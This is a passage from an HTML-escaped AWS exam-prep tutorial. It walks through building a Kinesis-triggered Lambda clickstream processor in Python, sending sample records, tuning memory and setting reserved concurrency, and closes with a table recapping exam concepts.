For RDS specifically, use &lt;strong&gt;RDS Proxy&lt;/strong&gt; to manage connection pooling.  Lambda can open hundreds of connections simultaneously, which can overwhelm a database.&lt;/p&gt;
&lt;/blockquote&gt;




&lt;h2&gt;
  
  
  Part V
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Process Streaming Data with Kinesis
&lt;/h3&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Let's build a real-time clickstream processor.&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;Create a Kinesis Data Stream&lt;/strong&gt;
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Step 01:&lt;/strong&gt; Open the &lt;strong&gt;Kinesis&lt;/strong&gt; console&lt;br&gt;
Click &lt;strong&gt;Create data stream&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Data stream name:&lt;/strong&gt; &lt;code&gt;clickstream&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Capacity mode:&lt;/strong&gt; &lt;code&gt;On-demand&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Click &lt;strong&gt;Create data stream&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;✅Green banner:&lt;/strong&gt; Data stream clickstream successfully created&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 02:&lt;/strong&gt; Create the Stream Processor Function&lt;br&gt;
Go to &lt;strong&gt;Lambda&lt;/strong&gt; → &lt;strong&gt;Create function&lt;/strong&gt;&lt;br&gt;
Configure:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Function name:&lt;/strong&gt; &lt;code&gt;ClickstreamProcessor&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Runtime:&lt;/strong&gt; Python 3.12&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Memory:&lt;/strong&gt; 512 MB&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Timeout:&lt;/strong&gt; 60 seconds&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Step 03:&lt;/strong&gt; Paste this code&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;json&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;base64&lt;/span&gt;
&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;datetime&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;datetime&lt;/span&gt;

&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;lambda_handler&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;event&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;context&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="sh"&gt;"""&lt;/span&gt;&lt;span class="s"&gt;
    Processes clickstream records from Kinesis in near real time.

    Key concepts for the exam:
    - Kinesis data is base64 encoded
    - Records come in batches
    - The partition key determines which shard receives the record
    - Use a high-cardinality partition key (like userId) for even distribution
    &lt;/span&gt;&lt;span class="sh"&gt;"""&lt;/span&gt;
    &lt;span class="n"&gt;processed&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;
    &lt;span class="n"&gt;failed&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;

    &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Received &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;event&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;Records&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt; records from Kinesis&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;record&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;event&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;Records&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;]:&lt;/span&gt;
        &lt;span class="k"&gt;try&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="c1"&gt;# Kinesis data is base64 encoded — decode it
&lt;/span&gt;            &lt;span class="n"&gt;raw_data&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;base64&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;b64decode&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;record&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;kinesis&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;][&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;data&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;]).&lt;/span&gt;&lt;span class="nf"&gt;decode&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;utf-8&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="n"&gt;data&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;json&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;loads&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;raw_data&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

            &lt;span class="c1"&gt;# Extract clickstream fields
&lt;/span&gt;            &lt;span class="n"&gt;user_id&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;userId&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;anonymous&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="n"&gt;page&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;page&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;unknown&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="n"&gt;action&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;action&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;unknown&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="n"&gt;timestamp&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;timestamp&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;datetime&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;utcnow&lt;/span&gt;&lt;span class="p"&gt;().&lt;/span&gt;&lt;span class="nf"&gt;isoformat&lt;/span&gt;&lt;span class="p"&gt;())&lt;/span&gt;

            &lt;span class="c1"&gt;# Process the click event
&lt;/span&gt;            &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Click: user=&lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;user_id&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt;, page=&lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;page&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt;, action=&lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;action&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt;, time=&lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;timestamp&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

            &lt;span class="c1"&gt;# In a real app, you'd:
&lt;/span&gt;            &lt;span class="c1"&gt;# - Aggregate metrics
&lt;/span&gt;            &lt;span class="c1"&gt;# - Write to DynamoDB or S3
&lt;/span&gt;            &lt;span class="c1"&gt;# - Trigger alerts for specific patterns
&lt;/span&gt;
            &lt;span class="n"&gt;processed&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;

        &lt;span class="k"&gt;except&lt;/span&gt; &lt;span class="nb"&gt;Exception&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Failed to process record: &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="nf"&gt;str&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="n"&gt;failed&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;

    &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Batch complete: &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;processed&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt; processed, &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;failed&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt; failed&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;statusCode&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;200&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;body&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;json&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;dumps&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;
            &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;processed&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;processed&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;failed&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;failed&lt;/span&gt;
        &lt;span class="p"&gt;})&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Click &lt;strong&gt;Deploy&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;✅Green banner:&lt;/strong&gt; Successfully updated the function "ClickstreamProcessor".&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 04:&lt;/strong&gt; &lt;strong&gt;Add Permissions&lt;/strong&gt;&lt;br&gt;
The Lambda execution role needs permission to read from Kinesis:&lt;br&gt;
Go to &lt;strong&gt;Configuration&lt;/strong&gt; → &lt;strong&gt;Permissions&lt;/strong&gt; → click the role name&lt;br&gt;
&lt;strong&gt;Add permissions&lt;/strong&gt; → &lt;strong&gt;Attach policies&lt;/strong&gt;&lt;br&gt;
Search for and attach &lt;code&gt;AmazonKinesisReadOnlyAccess&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 05:&lt;/strong&gt; Connect Kinesis to Lambda&lt;br&gt;
In the &lt;code&gt;ClickstreamProcessor&lt;/code&gt; function, click &lt;strong&gt;Add trigger&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 06:&lt;/strong&gt; Add trigger&lt;br&gt;
&lt;strong&gt;Select a source ▼:&lt;/strong&gt; &lt;code&gt;Kinesis&lt;/code&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Kinesis stream:&lt;/strong&gt; &lt;code&gt;clickstream&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Batch size:&lt;/strong&gt; &lt;code&gt;100&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Starting position:&lt;/strong&gt; Latest&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Batch window:&lt;/strong&gt; &lt;code&gt;5&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;On-failure destination:&lt;/strong&gt; ``&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Retry attempts:&lt;/strong&gt; &lt;code&gt;3&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Split batch on error:&lt;/strong&gt; &lt;code&gt;✔ enabled&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Concurrent batches per shard:&lt;/strong&gt; &lt;code&gt;10&lt;/code&gt; &lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Click &lt;strong&gt;Add&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;✅Green banner:&lt;/strong&gt; The trigger clickstream was successfully added to function ClickstreamProcessor.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key Kinesis + Lambda settings:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Batch size:&lt;/strong&gt; how many records per invocation (max 10,000)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Batch window:&lt;/strong&gt; how long to wait to fill the batch (max 300s)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Parallelization factor:&lt;/strong&gt; (1–10) process multiple batches per shard concurrently&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Bisect batch on error:&lt;/strong&gt; splits the batch in half on failure to isolate the bad record&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Starting position:&lt;/strong&gt; LATEST (new records only) or TRIM_HORIZON (from the beginning)&lt;/li&gt;
&lt;/ul&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;strong&gt;Step 07:&lt;/strong&gt; &lt;strong&gt;Test with Sample Data&lt;/strong&gt;&lt;br&gt;
Send test records to the stream:&lt;br&gt;
Open the &lt;strong&gt;Kinesis&lt;/strong&gt; console → click &lt;code&gt;clickstream&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 08:&lt;/strong&gt; &lt;strong&gt;clickstream&lt;/strong&gt;&lt;br&gt;
Click &lt;strong&gt;Data viewer&lt;/strong&gt; tab&lt;br&gt;
Or use the &lt;strong&gt;AWS CLI&lt;/strong&gt; to send test data:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;`shell&lt;br&gt;
aws kinesis put-record \&lt;br&gt;
  --stream-name clickstream \&lt;br&gt;
  --partition-key "USER-001" \&lt;br&gt;
  --data '{"userId":"USER-001","page":"/products/laptop","action":"view","timestamp":"2026-04-24T10:00:00Z"}'&lt;br&gt;
`&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 09:&lt;/strong&gt; Check the &lt;code&gt;ClickstreamProcessor&lt;/code&gt; CloudWatch logs to see the processed records&lt;/p&gt;




&lt;h2&gt;
  
  
  Part VI
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Performance Tuning
&lt;/h3&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;Memory vs Duration Experiment&lt;/strong&gt;
&lt;/h4&gt;

&lt;blockquote&gt;
&lt;p&gt;Let's see how memory affects performance:&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;strong&gt;Step 01:&lt;/strong&gt; Open the &lt;code&gt;ClickstreamProcessor&lt;/code&gt; function&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 02:&lt;/strong&gt; &lt;strong&gt;Configuration&lt;/strong&gt; → &lt;strong&gt;General configuration&lt;/strong&gt; → &lt;strong&gt;Edit&lt;/strong&gt;&lt;br&gt;
Set &lt;strong&gt;Memory&lt;/strong&gt; to &lt;strong&gt;128 MB&lt;/strong&gt; → &lt;strong&gt;Save&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 03:&lt;/strong&gt; Run a test → note the &lt;strong&gt;Duration&lt;/strong&gt; and &lt;strong&gt;Max Memory Used&lt;/strong&gt; in the execution results&lt;/p&gt;

&lt;p&gt;&lt;code&gt;`json&lt;br&gt;
{&lt;br&gt;
  "Records": [&lt;br&gt;
    {&lt;br&gt;
      "kinesis": {&lt;br&gt;
        "data": "eyJ1c2VySWQiOiJVU0VSLTAwMSIsInBhZ2UiOiIvcHJvZHVjdHMvbGFwdG9wIiwiYWN0aW9uIjoidmlldyIsInRpbWVzdGFtcCI6IjIwMjYtMDQtMjRUMTA6MDA6MDBaIn0="&lt;br&gt;
      },&lt;br&gt;
      "eventSource": "aws:kinesis",&lt;br&gt;
      "eventSourceARN": "arn:aws:kinesis:us-east-1:123456789012:stream/clickstream"&lt;br&gt;
    },&lt;br&gt;
    {&lt;br&gt;
      "kinesis": {&lt;br&gt;
        "data": "eyJ1c2VySWQiOiJVU0VSLTAwMiIsInBhZ2UiOiIvY2hlY2tvdXQiLCJhY3Rpb24iOiJjbGljayIsInRpbWVzdGFtcCI6IjIwMjYtMDQtMjRUMTA6MDE6MDBaIn0="&lt;br&gt;
      },&lt;br&gt;
      "eventSource": "aws:kinesis",&lt;br&gt;
      "eventSourceARN": "arn:aws:kinesis:us-east-1:123456789012:stream/clickstream"&lt;br&gt;
    }&lt;br&gt;
  ]&lt;br&gt;
}&lt;br&gt;
`&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 04:&lt;/strong&gt; Change memory to &lt;strong&gt;256 MB&lt;/strong&gt; → test again&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 05:&lt;/strong&gt; Change to &lt;strong&gt;512 MB&lt;/strong&gt; → test again&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 06:&lt;/strong&gt; Change to &lt;strong&gt;1024 MB&lt;/strong&gt; → test again&lt;/p&gt;

&lt;p&gt;You'll typically see:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;&lt;strong&gt;Memory&lt;/strong&gt;&lt;/th&gt;
&lt;th&gt;Duration&lt;/th&gt;
&lt;th&gt;Billed Duration&lt;/th&gt;
&lt;th&gt;&lt;em&gt;Cost per Invocation&lt;/em&gt;&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;128 MB&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;~200ms&lt;/td&gt;
&lt;td&gt;200ms&lt;/td&gt;
&lt;td&gt;&lt;em&gt;Low per-ms, but slow&lt;/em&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;256 MB&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;~110ms&lt;/td&gt;
&lt;td&gt;110ms&lt;/td&gt;
&lt;td&gt;&lt;em&gt;Sweet spot for many functions&lt;/em&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;512 MB&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;~60ms&lt;/td&gt;
&lt;td&gt;60ms&lt;/td&gt;
&lt;td&gt;&lt;em&gt;Faster, slightly more per-ms&lt;/em&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;1024 MB&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;~55ms&lt;/td&gt;
&lt;td&gt;55ms&lt;/td&gt;
&lt;td&gt;&lt;em&gt;Diminishing returns&lt;/em&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;The sweet spot is where increasing memory no longer significantly reduces duration.&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;strong&gt;Step 07:&lt;/strong&gt; Concurrency Settings&lt;br&gt;
&lt;strong&gt;Configuration&lt;/strong&gt; → &lt;strong&gt;Concurrency and recursion detection&lt;/strong&gt; &lt;br&gt;
&lt;strong&gt;Concurrency&lt;/strong&gt;→ &lt;strong&gt;Edit&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 08:&lt;/strong&gt; &lt;strong&gt;Edit concurrency&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;USe unreserved account concurrency:&lt;/strong&gt; Uses the shared regional pool (default 1000)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Reserve concurrency:&lt;/strong&gt; Guarantees capacity AND caps the function&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Select &lt;strong&gt;Reserve concurrency:&lt;/strong&gt; &lt;code&gt;50&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Click &lt;strong&gt;Save&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;✅Green banner:&lt;/strong&gt; Your changes have been saved.&lt;/p&gt;

&lt;p&gt;This means:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Your function is guaranteed 50 concurrent executions&lt;/li&gt;
&lt;li&gt;It can never exceed 50 (acts as a throttle)&lt;/li&gt;
&lt;li&gt;The remaining 950 are available for other functions&lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Reserved concurrency is free and serves two purposes&lt;/strong&gt;: guaranteeing capacity AND protecting downstream services from being overwhelmed. Provisioned concurrency costs money even when idle but eliminates cold starts.&lt;/p&gt;
&lt;/blockquote&gt;




&lt;h2&gt;
  
  
  🏗️ What You Built | 📘Exam Concepts Recap
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;&lt;strong&gt;What You Did&lt;/strong&gt;&lt;/th&gt;
&lt;th&gt;&lt;em&gt;Exam Concept&lt;/em&gt;&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Created a Lambda function and configured memory/timeout&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;em&gt;Lambda configuration parameters&lt;/em&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Built and attached a Lambda Layer&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;em&gt;Sharing code across functions, layer structure and limits&lt;/em&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Set up a DLQ and Lambda Destinations&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;em&gt;Async error handling, event lifecycle&lt;/em&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Used &lt;code&gt;--invocation-type Event&lt;/code&gt; to trigger async flow&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;em&gt;Synchronous vs asynchronous invocation types&lt;/em&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Attached Lambda to a VPC with subnets and security group&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;em&gt;VPC access for private resources (RDS, ElastiCache)&lt;/em&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Initialized SDK clients outside the handler&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;em&gt;Connection reuse, cold start optimization&lt;/em&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Created a Kinesis stream and connected it to Lambda&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;em&gt;Real-time data processing, event source mappings&lt;/em&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Configured batch size, batch window, parallelization factor&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;em&gt;Kinesis + Lambda tuning for throughput&lt;/em&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Enabled bisect batch on error&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;em&gt;Isolating bad records in stream processing&lt;/em&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Changed memory settings and compared Duration&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;em&gt;Performance tuning, memory = CPU relationship&lt;/em&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Set reserved concurrency&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;em&gt;Throttling, capacity guarantees, protecting downstream services&lt;/em&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;




&lt;h2&gt;
  
  
  ⚠️ Clean Up Protocol
&lt;/h2&gt;

